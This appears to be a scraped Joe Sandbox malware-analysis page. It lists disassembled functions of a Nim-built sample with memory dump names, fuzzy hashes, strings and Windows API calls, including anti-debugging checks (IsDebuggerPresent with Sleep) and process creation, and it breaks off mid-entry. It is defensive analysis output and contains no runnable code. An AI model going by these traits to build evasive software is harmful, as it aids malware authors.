Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: CodeExitObjectProcessSingleWait
String ID: D
API String ID: 1680577353-2746444292
Opcode ID: 7834761ca93e310d57ec43d371a6e7913b6d639fab413df3cd0c8db712862868
Instruction ID: c9247f4298294d217eef209494abb4146b9393d321e5a43f42c01f75c4193ff9
Opcode Fuzzy Hash: 7834761ca93e310d57ec43d371a6e7913b6d639fab413df3cd0c8db712862868
Instruction Fuzzy Hash: F432F1B0E0429D8BEB20DFAAC49479DBBF1BF44304F14916EE455BB292E774A845CF42

Function 00EF8129 Relevance: 5.8, Strings: 3, Instructions: 2032COMMON

Download Yara Rule

Strings

kI,B, xrefs: 00EF9B7E
@, xrefs: 00EF89F4
@, xrefs: 00EF926D

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: _wgetenv
String ID: @$@$kI,B
API String ID: 1821490009-2128285436
Opcode ID: 7f10f50fd89c76610adc572b0271114c4233139e4ae8d5fa4a6bbff4c8d957ff
Instruction ID: 1b1ed0ba6e9e6c20087e3ba7563bef0d1cb1b0898803345f18842aa8dc83b7d6
Opcode Fuzzy Hash: 7f10f50fd89c76610adc572b0271114c4233139e4ae8d5fa4a6bbff4c8d957ff
Instruction Fuzzy Hash: E5233871A0026C8FDB64DF29C981B99B7F2BB89304F0591E9E54DA7362DB309E81CF51

Function 00EF587C Relevance: 3.5, APIs: 2, Instructions: 540
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EE7341: CoInitialize.OLE32(?), ref: 00EE7364
Part of subcall function 00EE7341: SysAllocString.OLEAUT32(?), ref: 00EE73BF

Part of subcall function 00EE6150: VariantClear.OLEAUT32 ref: 00EE6178

Sleep.KERNELBASE ref: 00EF5734
IsDebuggerPresent.KERNEL32(00000000), ref: 00EF5756

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: AllocClearDebuggerInitializePresentSleepStringVariant
String ID:
API String ID: 3378142341-0
Opcode ID: 2d80728af3ff50a0d3662fb3510f193d98bad08914f1591e37c8770fbbc7ced5
Instruction ID: c25f95106f5dd75713654e391da5c4911c48ce8e0ba3e74ff1d9227a64c919c6
Opcode Fuzzy Hash: 2d80728af3ff50a0d3662fb3510f193d98bad08914f1591e37c8770fbbc7ced5
Instruction Fuzzy Hash: B04227B0A052AC8FEB61DF25C8847A9B7F5BB45308F0150D9D24DAB252CB749E84CF19

Function 00EE9029 Relevance: 3.2, Strings: 2, Instructions: 665COMMON

Download Yara Rule

Strings

;eD0, xrefs: 00EE938C
3}>f, xrefs: 00EE94B8

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: Initialize
String ID: 3}>f$;eD0
API String ID: 2538663250-262806450
Opcode ID: 446ed0f31225ed0fd5e7af6281e3f9b7aff65258196479ba0f2d422b3af55310
Instruction ID: 7a0bea95056506783c83e96ee87625ccf58cea8822ecd93c4755beaf59cd6cc9
Opcode Fuzzy Hash: 446ed0f31225ed0fd5e7af6281e3f9b7aff65258196479ba0f2d422b3af55310
Instruction Fuzzy Hash: 8462D5B0D052AD8FEB20DF66C89579EBBF1BF45308F10909AD059BB292DB744988CF51

Function 00F028AE Relevance: 1.7, APIs: 1, Instructions: 201COMMON

Download Yara Rule

APIs

RtlAddVectoredExceptionHandler.NTDLL ref: 00F02917

Part of subcall function 00F01DEF: free.MSVCRT ref: 00F01E32

Part of subcall function 00F0278D: abort.MSVCRT ref: 00F02897

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: ExceptionHandlerVectoredabortfree
String ID:
API String ID: 3783204689-0
Opcode ID: 4b29cae8477de989c47dc52f4962fb0ddff27b83ae639411492937703495a8a3
Instruction ID: d6c235c51eb89e04cedc600b6b41d71a451b56d98554cbd8c0c659276728fe69
Opcode Fuzzy Hash: 4b29cae8477de989c47dc52f4962fb0ddff27b83ae639411492937703495a8a3
Instruction Fuzzy Hash: 4891B4B4E042099FDB40EFA8D989A9DB7F0FF44314F0184A9E8649B3A1D774EA44EF51

Function 00EE83A5 Relevance: .7, Instructions: 665COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 5393bdc6653cc25a76e4d63f190dfee2ade705367fe9d59c23749794c3fb1cc9
Instruction ID: e1bd68056f9ec0d3169f8310632f93dcb0edd5bf5efb77b7393b34ca28d95e27
Opcode Fuzzy Hash: 5393bdc6653cc25a76e4d63f190dfee2ade705367fe9d59c23749794c3fb1cc9
Instruction Fuzzy Hash: 7E62D2B0E042AD8FEB20DF66C99579DBBF1BB44308F10909AD05CBB292DB754988DF51

Function 00EF63DF Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 490COMMON

Download Yara Rule

Strings

-, xrefs: 00EF760D
parseHook, xrefs: 00EF64D8, 00EF761D
JsonError, xrefs: 00EF6407, 00EF64C0, 00EF6989, 00EF7594, 00EF7605
jsony.nim, xrefs: 00EF64D0, 00EF7615
-, xrefs: 00EF64C8

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID: -$-$JsonError$jsony.nim$parseHook
API String ID: 0-2511633537
Opcode ID: 5f5b9e9b618e0e12597be4ef532f88eb8cac4e0ba4be5ac4e270be252054ebe0
Instruction ID: 2a6d3d56b4a8b64c94b788c64e748b7eeb933f4d25f3a8774b3a43b2881ee73c
Opcode Fuzzy Hash: 5f5b9e9b618e0e12597be4ef532f88eb8cac4e0ba4be5ac4e270be252054ebe0
Instruction Fuzzy Hash: 9F3238B0A042AD8FDB61DF19C8807A9B7F1BF41308F0190D9E648AB252CB749EC5DF59

Function 00EE79AA Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 296
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

com.nim, xrefs: 00EE7CBA
getValue, xrefs: 00EE7CC2
COMError, xrefs: 00EE7CB5

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID: COMError$com.nim$getValue
API String ID: 0-564522733
Opcode ID: 1d8f3847387a94f55c27aa92007e59cf8d7798b48a650342cf0a44f2be15ac85
Instruction ID: 6febd04b3afb7f05613926ae30e1e60b67f4e8b3c86141d9bb39caa68b3adf8b
Opcode Fuzzy Hash: 1d8f3847387a94f55c27aa92007e59cf8d7798b48a650342cf0a44f2be15ac85
Instruction Fuzzy Hash: 9FD11574D0829C9FDF11EFA5C8807ADBBF1AF5A300F249499E880BB356D7749845CB92

Function 00EE6D2D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoInitialize.OLE32 ref: 00EE6D5C
CoGetClassObject.COMBASE ref: 00EE6E74

Strings

CreateObject, xrefs: 00EE6F07
com.nim, xrefs: 00EE6EFF
COMError, xrefs: 00EE6EFA

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: ClassInitializeObject
String ID: COMError$CreateObject$com.nim
API String ID: 2072964892-2591894477
Opcode ID: 9fcbe6f9c9996e2b0bf0e6aab265961fd4fc2dedfebcd829f6d01f7a1480f155
Instruction ID: 21e55ba116d2aa56e75ec6b0f87a235566739c6794d25deab380c8f9c9fd6b9a
Opcode Fuzzy Hash: 9fcbe6f9c9996e2b0bf0e6aab265961fd4fc2dedfebcd829f6d01f7a1480f155
Instruction Fuzzy Hash: 055179B4E042889FCB20EFA9D88479EBFF0BF55344F149469E490AB392D7749845DF42

Function 00EF47C7 Relevance: 7.6, APIs: 5, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EE80E7: CreatePipe.KERNELBASE ref: 00EE812B
Part of subcall function 00EE80E7: GetLastError.KERNEL32 ref: 00EE8138

SetHandleInformation.KERNEL32 ref: 00EF4809
GetLastError.KERNEL32 ref: 00EF4816
SetHandleInformation.KERNEL32 ref: 00EF4853
SetHandleInformation.KERNEL32 ref: 00EF4879
GetLastError.KERNEL32 ref: 00EF48B5

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: ErrorHandleInformationLast$CreatePipe
String ID:
API String ID: 3790209225-0
Opcode ID: c634105da2dfab1277af9d5442572d7a7c71fa2b0855c3dbf9111476096202b6
Instruction ID: 15794071f63467de4f36412213cdc07c4bac76d6e4e073d1a808e5274e989f56
Opcode Fuzzy Hash: c634105da2dfab1277af9d5442572d7a7c71fa2b0855c3dbf9111476096202b6
Instruction Fuzzy Hash: B841A2B09043DD9FEB10AF65C944B7ABBF4AF44304F10A499E684632D2D7748C84DB12

Function 00EF49FE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 166
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE ref: 00EF4AFC
GetLastError.KERNEL32 ref: 00EF4B07

Strings

W, xrefs: 00EF4B76

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: CreateErrorLastProcess
String ID: W
API String ID: 2919029540-655174618
Opcode ID: fb58c6251675b0f3bbd94e839b5ee2ebbef8e86deae05d9194a688508f70bcbc
Instruction ID: 9b665f2f4beeb2a9313e354488e915445230b2ed5c4d03e7c24054333c6b8ac8
Opcode Fuzzy Hash: fb58c6251675b0f3bbd94e839b5ee2ebbef8e86deae05d9194a688508f70bcbc
Instruction Fuzzy Hash: 967125B09053AE8FEB24DB65C940BAAFBF0AF44304F14A59AD54877292E7709E80CF41

Function 00EE1BBA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00EE1B7F: strlen.MSVCRT ref: 00EE1B8E
Part of subcall function 00EE1B7F: fwrite.MSVCRT ref: 00EE1BA6
Part of subcall function 00EE1B7F: fflush.MSVCRT ref: 00EE1BAE

exit.MSVCRT ref: 00EE1BDE
VirtualAlloc.KERNELBASE ref: 00EE1C04

Strings

out of memory, xrefs: 00EE1BCD

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: AllocVirtualexitfflushfwritestrlen
String ID: out of memory
API String ID: 3211969242-49810860
Opcode ID: fe29da8184f7e646b92cbefa59fd76f4227ac7822c5d5dbfd29e612d8d3d2618
Instruction ID: b44b9c86d80df2cec6ed252e4deb170f58bb898a19547fd7aa84611ebebc8d91
Opcode Fuzzy Hash: fe29da8184f7e646b92cbefa59fd76f4227ac7822c5d5dbfd29e612d8d3d2618
Instruction Fuzzy Hash: ABE012B04083489BE3007FB9C90A31DBEE8AB40304F41859CE9D457297EBB894849BD7

Function 00F03841 Relevance: 4.6, APIs: 3, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50a146a4ba82df3807d1d843970ce5279e777fc5fe7d246d4d672345109492a4
Instruction ID: 3ae2f369fc226d1d19b0a9ccc90dc1a16eb078937f2a3bf5d97aa8cc2988cc7b
Opcode Fuzzy Hash: 50a146a4ba82df3807d1d843970ce5279e777fc5fe7d246d4d672345109492a4
Instruction Fuzzy Hash: CF41F8709042199FDB40EF68DD84B8EBBF4FF88314F018559E454AB3A1D3B89944EFA2

Function 00F01729 Relevance: 3.8, APIs: 3, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

calloc.MSVCRT ref: 00F01741
abort.MSVCRT ref: 00F0B655

Part of subcall function 00F03527: realloc.MSVCRT ref: 00F0357C

malloc.MSVCRT ref: 00F01791
memcpy.MSVCRT ref: 00F017BD
malloc.MSVCRT ref: 00F01843

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: malloc$abortcallocmemcpyrealloc
String ID:
API String ID: 3078593747-0
Opcode ID: eea7d1e624b561c60a285b1d91812cd55cbebd9d8e049e89377b55826a0b0c04
Instruction ID: 397a3b1b5ce6213ac22350219d1d19f95f06c18592d6c516c61e47f94a8f2f61
Opcode Fuzzy Hash: eea7d1e624b561c60a285b1d91812cd55cbebd9d8e049e89377b55826a0b0c04
Instruction Fuzzy Hash: E6113975A047068FDB10DF24C98425AB7E5FF88314F06C829E98D9B341EB31E906EF81

Function 00F030F4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

once %p is %d, xrefs: 00F031C5

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID:
String ID: once %p is %d
API String ID: 0-95064319
Opcode ID: 99c4cd2b5d7880182126ca43da776fbf79b16a374b77022212d74a5a42693f80
Instruction ID: 18d822569e281dbcdd609e98439b40ad928276e515f6875ead12f59f54daf8cd
Opcode Fuzzy Hash: 99c4cd2b5d7880182126ca43da776fbf79b16a374b77022212d74a5a42693f80
Instruction Fuzzy Hash: 9031A4B4A04209DFDB00EFA8C88579DBBF4FF49354F108819E8959B391D778DA80AF91

Function 00EF65BC Relevance: 3.3, APIs: 2, Instructions: 316
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE ref: 00EF5734
IsDebuggerPresent.KERNEL32(00000000), ref: 00EF5756

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: DebuggerPresentSleep
String ID:
API String ID: 598088951-0
Opcode ID: 5472466e49daeaf35be27615e7ed844cab9c12da075525af4dbff230441bf022
Instruction ID: 26d38146c8a5e3c284af8ae54d9627a8c1ea6b4368daa8131542d53e44670271
Opcode Fuzzy Hash: 5472466e49daeaf35be27615e7ed844cab9c12da075525af4dbff230441bf022
Instruction Fuzzy Hash: 7EF129B0A052AC8FEB61DB19C9807A8B7F5BF51308F0550D9E349BB252CB749E84CF19

Function 00EE7341 Relevance: 3.1, APIs: 2, Instructions: 56memoryCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(?), ref: 00EE7364
SysAllocString.OLEAUT32(?), ref: 00EE73BF

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961032552.0000000000F0C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961062257.0000000000F0D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961087773.0000000000F18000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961121959.0000000000F1C000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2961147801.0000000000F1D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ee0000_1734347766284d20dc9a2ac535c59f41881efe888891552ad79abf01710e07a6dadfae.jbxd

Similarity

API ID: AllocInitializeString
String ID:
API String ID: 3145325428-0
Opcode ID: 312f8761f2a57aa0a06238da84f1cb50efbdf5415b926229bbe902760729eeb3
Instruction ID: 36aa0d30a6c0bdc0e95b12c0c69b3645c0b7409a5e431a74d936bb0dca751af2
Opcode Fuzzy Hash: 312f8761f2a57aa0a06238da84f1cb50efbdf5415b926229bbe902760729eeb3
Instruction Fuzzy Hash: 0F11C2719082CE5BDB617FB6CC8475EBBD0AF01348F155169EAD05B382DBB94C40A7A2

Function 00EE4BD9 Relevance: 3.0, APIs: 2, Instructions: 50fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE ref: 00EE4C13
GetLastError.KERNEL32 ref: 00EE4C33

Memory Dump Source

Source File: 00000000.00000002.2960994897.0000000000EE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EE0000, based on PE: true

Associated: 00000000.00000002.2960904847.0000000000EE0000.00000002.00000001.01000000.00000003.sdmpDownload File
